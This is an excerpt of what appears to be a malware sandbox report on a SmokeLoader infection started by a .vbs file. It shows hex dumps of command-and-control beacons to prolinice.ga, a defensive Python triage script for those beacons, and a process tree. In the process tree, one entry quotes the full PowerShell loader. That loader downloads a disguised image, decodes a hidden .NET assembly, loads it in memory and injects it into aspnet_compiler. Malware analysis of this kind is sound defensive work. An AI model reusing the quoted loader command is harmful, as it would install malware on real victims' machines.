                                                                                                                                                    Jan 9, 2025 08:02:45.418793917 CET1236INData Raw: 3a 8d 8e cb 46 35 1a 7d f4 ef 1b d7 93 ab 25 b8 e4 a0 82 b6 86 fd 09 d8 a2 56 03 b9 bb 52 d2 5a 38 70 92 0a 6f 3e 66 10 29 91 14 e3 c8 e6 94 a8 a4 07 12 25 68 3e 18 de c7 0a 45 28 0f 3d 2b 64 16 02 7e ff 0f a4 b4 58 7b 10 00 8c 05 3f 8c c3 7c 9e
                                                                                                                                                    Data Ascii: :F5}%VRZ8po>f)%h>E(=+d~X{?|Ki06aKs=l?D7D;z6UM"iI"dioztH*{XgQlF}7u\C7:,#4QBGg 6!D6w\)85
                                                                                                                                                    Jan 9, 2025 08:02:45.418910027 CET1236INData Raw: 84 a9 cc 3b 27 55 20 28 f5 e4 f0 78 5e 1c 8e b8 52 e9 61 ab 70 7a 85 27 8f 78 0d 7a ea be c2 6f cb e2 76 e4 97 a3 c9 96 89 91 ea 3a 3f 38 2c 65 17 f7 0f 58 91 00 4f 5c d5 5b d5 e7 e3 a4 79 62 2a d3 08 62 f3 d5 fa 87 d5 e0 9e f7 7d 8b df 15 4a 12
                                                                                                                                                    Data Ascii: ;'U (x^Rapz'xzov:?8,eXO\[yb*b}Jp>0+;*8-hg=hYQIHI,%07?b{Kk'BS\kV#vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dg
                                                                                                                                                    Jan 9, 2025 08:02:45.418925047 CET1236INData Raw: 92 ea 93 ce c8 3e fc 5a 3e 39 d3 ea ef e1 a4 b4 b6 2d 36 1e 6a da 77 63 fa f0 9c d7 df ca db b4 76 11 2d 5d 69 c2 4d 81 7c 26 e0 2d 27 6c d3 89 5a 1d 68 79 e5 c1 7e 0e b4 d7 d3 68 a6 3b fe 86 fa da 27 b9 07 35 a4 83 b4 3d f1 e3 59 a4 0e 98 a2 4c
                                                                                                                                                    Data Ascii: >Z>9-6jwcv-]iM|&-'lZhy~h;'5=YLiy24^!pB-EN9skxX|n},kx\u*1"p}I>-SfjOYfO?d$UW=#KTZBhV1X)jGD_C
                                                                                                                                                    Jan 9, 2025 08:02:45.418936968 CET1120INData Raw: a4 ac b4 43 c2 a6 fd 64 18 c3 67 49 9b c3 fd 66 e0 83 93 db 2f d1 a5 05 8c 81 1e 21 49 68 1f 6e 94 20 ef 17 fc 14 0f 5a 69 db 40 a6 58 74 e1 44 c4 09 1b af 2a ba fb 88 c0 a4 d0 5e 14 ee 23 0d 4e c0 c8 89 6f 2c 87 34 0b 30 3b dc 3b 0d 3e fe 69 8d
                                                                                                                                                    Data Ascii: CdgIf/!Ihn Zi@XtD*^#No,40;;>i[tH6VCwTEk:0&JtICdsW2RU"`-u[WfHMG>GW=]%5AjZA][az,:S/q+
                                                                                                                                                    Jan 9, 2025 08:02:45.418989897 CET1236INData Raw: 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f 3e 4a 0c d7 79 3b 83 74 21 4f 0a a0 14 6a e2 95 a1 99 f8 12 7d b0 e3 d3 ba 48 78 e2 e8 71 e9 9c e6 a3 dc 91 cb d4 a3 f1 0d 3a c6 3f b3 f3 d9 97 91 49 d3 be 04
                                                                                                                                                    Data Ascii: z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[KgeK4Zb4rdi 8?}jO;
                                                                                                                                                    Jan 9, 2025 08:02:45.418999910 CET224INData Raw: 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a ba 08 48 9b fb ba 78 e4 ac 74 0f dc fb aa 1d 89 45 99 38 5e 4c 93 a3 ec 34 c1 0a 2c cb dc 87 b2 14 06 72 07 32 c1 1b 09 c1 94 54 35 6e 39 6e 0d eb 44 30 ce f3
                                                                                                                                                    Data Ascii: }b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\LMj8Lcyy:_w|O|:83GU.R=
                                                                                                                                                    Jan 9, 2025 08:02:45.419035912 CET1236INData Raw: 90 7d 0f 3a 11 da 07 18 69 c9 f9 71 a7 39 b5 5b 4e dc c5 8a f3 54 7d 5d 3b d2 b1 96 9f 58 75 18 61 b0 ca 9b 8b d8 1a 4a 36 03 5b b6 f6 3f f8 f6 27 e8 8b 5a 1c d0 47 a3 50 e6 c4 e8 49 ed 16 93 c6 4f 1e 1e 70 6f 39 17 f5 bb bc 1c bc dd f6 6f 51 97
                                                                                                                                                    Data Ascii: }:iq9[NT}];XuaJ6[?'ZGPIOpo9oQDoOVFhuu<gB#qx)z#j-d$hUe4U4GX (7@2$.D^Deti{j\p%M;*^ kn?'Cx
                                                                                                                                                    Jan 9, 2025 08:02:45.419116020 CET1236INData Raw: e0 b5 95 e4 56 a6 4d 3e cd fa 83 56 80 76 88 da b8 39 04 2c 0c 2a 4a 2f 88 b2 83 c9 f1 f3 ca 27 e3 38 5c 99 e3 30 ab 16 18 02 e1 f2 ab 23 ec f0 2f 0e 40 c4 35 0c 56 44 9f 51 df d3 68 66 65 a4 5a 71 ec 54 e2 2c 25 1d b8 fe ff 39 c7 6c cd 89 b1 1f
                                                                                                                                                    Data Ascii: VM>Vv9,*J/'8\0#/@5VDQhfeZqT,%9lXFY![bKor_pkX"}Wmg^IZlJ|.)(FW9{U,O1NmO~`?m5[UdXlc,7^UEr<l]_4-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49942 | 46.173.214.14 | 80 | 2060 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 08:02:49.840712070 CET | 274 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://prolinice.ga/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 501
Host: prolinice.ga
Jan 9, 2025 08:02:49.840727091 CET | 501 | OUT | Data Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 65 a4 f0 a2
Data Ascii: nIjcLQ%!GzeI67feug]H8.6hEvRY;PLeOc~k_!z1rJC\S7W/x*>x :xGresn*q~jAkuE)\1>mnW61%_Q.,})!s~VD5HO!
Jan 9, 2025 08:02:50.795160055 CET | 584 | IN | HTTP/1.1 404 Not Found
Date: Thu, 09 Jan 2025 07:02:50 GMT
Server: Apache/2.4.59 (Debian)
Content-Length: 409
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49987 | 46.173.214.14 | 80 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 08:04:01.550930977 CET | 277 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gsfmhaothvg.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: prolinice.ga
Jan 9, 2025 08:04:01.550983906 CET | 109 | OUT | Data Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
Data Ascii: nIjcLQ%!GzeI67f+!"hm6hEv:RX;PLgjngaiF#Q 9
Jan 9, 2025 08:04:02.534200907 CET | 290 | IN | HTTP/1.1 404 Not Found
Date: Thu, 09 Jan 2025 07:04:02 GMT
Server: Apache/2.4.59 (Debian)
Content-Length: 115
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f
Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49988 | 46.173.214.14 | 80 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 08:04:03.187640905 CET | 277 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yilwfgipaws.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: prolinice.ga
Jan 9, 2025 08:04:03.187678099 CET | 109 | OUT | Data Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
Data Ascii: nIjcLQ%!GzeI67f+!"hm6hEv:RX;PLgjngaiF#Q 9
Jan 9, 2025 08:04:04.159723043 CET | 290 | IN | HTTP/1.1 404 Not Found
Date: Thu, 09 Jan 2025 07:04:03 GMT
Server: Apache/2.4.59 (Debian)
Content-Length: 115
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f
Data Ascii: o_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJ
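The four sessions above share one shape: the injected explorer.exe POSTs a binary body to /index.php on prolinice.ga with a form-urlencoded Content-Type, an IE11-style User-Agent, and a Referer naming a different, apparently random domain (session 2, from the 32-bit explorer.exe, is the exception with Referer equal to Host). The server answers 404 every time, but in sessions 1, 3 and 4 the 404 body is not HTML: session 1 carries a 0x52d53-byte chunked blob and sessions 3 and 4 carry 115 bytes whose first dword is 0x6f = 111 = 115 - 4, while session 2 gets a genuine Apache error page. The displayed request bodies also begin with the same 43 bytes in all four sessions. The Python below is an added example, not code from the report or from Joe Sandbox, that parses re-typed copies of these messages and scores the pair on those features. The request bodies hold only the bytes the report displays (fewer than the declared Content-Length), the indicator names and the 0.7 printable-ratio threshold are my choices, and reading the 404 body as length-prefixed records is an inference from the 115-byte responses, not a documented format.

```python
"""Triage of the explorer.exe -> prolinice.ga sessions above. Added example, not
code from the Joe Sandbox report. Bytes are re-typed from the capture; request
bodies hold only the bytes the report displays (fewer than Content-Length).
Feature names, the 0.7 threshold and the record layout are assumptions."""
from __future__ import annotations
import os
import struct
from dataclasses import dataclass
from urllib.parse import urlsplit

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


@dataclass
class HttpMessage:
    start_line: str
    headers: dict[str, str]  # header names lower-cased
    body: bytes


def parse_http(raw: bytes) -> HttpMessage:
    """Split one HTTP/1.1 message into start line, headers and raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0], headers, body)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or CR/LF/TAB."""
    return sum(0x20 <= b < 0x7F or b in b"\r\n\t" for b in data) / len(data) if data else 1.0


def beacon_indicators(req: HttpMessage, resp: HttpMessage) -> set[str]:
    """Features of one request/response pair that match sessions 1-4 above."""
    hits = set()
    method, target, _ = req.start_line.split(" ", 2)
    if method == "POST" and target == "/index.php":
        hits.add("post-index-php")
    ref_host = urlsplit(req.headers.get("referer", "")).hostname
    if ref_host and ref_host != req.headers.get("host"):
        hits.add("referer-host-mismatch")  # sessions 1, 3, 4; not session 2
    if req.headers.get("user-agent") == IE11_UA:
        hits.add("ie11-trident-ua")
    if (req.headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and printable_ratio(req.body) < 0.7):
        hits.add("binary-body-declared-as-form")
    if (resp.start_line.startswith("HTTP/1.1 404")
            and resp.headers.get("content-type", "").startswith("text/html")
            and not resp.body.lstrip().startswith(b"<")):
        hits.add("404-with-non-html-body")  # sessions 1, 3, 4; session 2 got real HTML
    return hits


def split_length_prefixed(body: bytes) -> list[bytes]:
    """Assumed layout: u32 little-endian length, then payload. Inferred only from
    the 115-byte 404 bodies (first dword 0x6f = 111 = 115 - 4); undocumented."""
    records, off = [], 0
    while off + 4 <= len(body):
        (n,) = struct.unpack_from("<I", body, off)
        off += 4
        if n > len(body) - off:
            raise ValueError(f"record at {off - 4} claims {n} bytes, {len(body) - off} left")
        records.append(body[off:off + n])
        off += n
    if off != len(body):
        raise ValueError(f"{len(body) - off} trailing bytes")
    return records


def common_prefix_len(blobs: list[bytes]) -> int:
    """Bytes shared at the start of every blob (a static header across beacons)."""
    return len(os.path.commonprefix(blobs))


def build_request(referer: str, content_length: int, body: bytes) -> bytes:
    head = ("POST /index.php HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
            f"Referer: {referer}\r\nUser-Agent: {IE11_UA}\r\n"
            f"Content-Length: {content_length}\r\nHost: prolinice.ga\r\n\r\n")
    return head.encode() + body


def build_404(date: str, body: bytes) -> bytes:
    head = (f"HTTP/1.1 404 Not Found\r\nDate: {date}\r\nServer: Apache/2.4.59 (Debian)\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n"
            "Content-Type: text/html; charset=utf-8\r\n\r\n")
    return head.encode() + body


# Request-body prefixes exactly as displayed for sessions 1-3 (session 4 repeats session 3).
BODY_S1 = bytes.fromhex(
    "6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65"
    " d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3"
    " 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 42 d8 fa cc")
BODY_S2 = bytes.fromhex(
    "6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65"
    " d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3"
    " 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 65 a4 f0 a2")
BODY_S3 = bytes.fromhex(
    "6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65"
    " d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3"
    " 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85")
BODY_S4 = BODY_S3

REQ_S2 = build_request("http://prolinice.ga/", 501, BODY_S2)
REQ_S3 = build_request("http://gsfmhaothvg.com/", 109, BODY_S3)
# Session 2: the genuine Apache error page. Session 3: 115 bytes of non-HTML data.
RESP_S2 = build_404("Thu, 09 Jan 2025 07:02:50 GMT", "\r\n".join([
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">', "<html><head>",
    "<title>404 Not Found</title>", "</head><body>", "<h1>Not Found</h1>",
    "<p>The requested URL /index.php was not found on this server.</p>",
    "<p>Additionally, a 404 Not Found error was encountered while trying to use an"
    " ErrorDocument to handle the request.</p>", "<hr>",
    "<address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address>",
    "</body></html>", ""]).encode())
RESP_S3 = build_404("Thu, 09 Jan 2025 07:04:02 GMT", bytes.fromhex(
    "6f 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5"
    " 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5"
    " 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51"
    " 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db"
    " 4a 1d 9f"))

if __name__ == "__main__":
    for name, req, resp in (("session 2", REQ_S2, RESP_S2), ("session 3", REQ_S3, RESP_S3)):
        print(name, sorted(beacon_indicators(parse_http(req), parse_http(resp))))
    print("shared body prefix:", common_prefix_len([BODY_S1, BODY_S2, BODY_S3, BODY_S4]), "bytes")
    print("404 records:", [len(r) for r in split_length_prefixed(parse_http(RESP_S3).body)])
```

Session 3 trips all five indicators; session 2 trips only the request-side ones, which is the point of keeping the response in the rule: a real 404 from the same host is what the server returns when it has nothing to hand out, and the binary 404 is the one worth carving. The shared 43-byte prefix across beacons from one victim is useful for clustering but is an observation about this capture only; do not assume it holds across machines.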


Target ID: 0
Start time: 02:01:56
Start date: 09/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs"
Imagebase: 0x7ff7f76c0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:02:01:56
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { 
[void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                                                                                    Imagebase:0x7ff741d30000
                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:02:01:56
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:02:02:19
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                    File size:56'368 bytes
                                                                                                                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:12
                                                                                                                                                    Start time:03:21:27
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:13
                                                                                                                                                    Start time:03:21:48
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\uahuajd
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\uahuajd
                                                                                                                                                    Imagebase:0xf0000
                                                                                                                                                    File size:56'368 bytes
                                                                                                                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:14
                                                                                                                                                    Start time:03:21:48
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:15
                                                                                                                                                    Start time:03:21:49
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:16
                                                                                                                                                    Start time:03:21:49
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:17
                                                                                                                                                    Start time:03:21:51
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
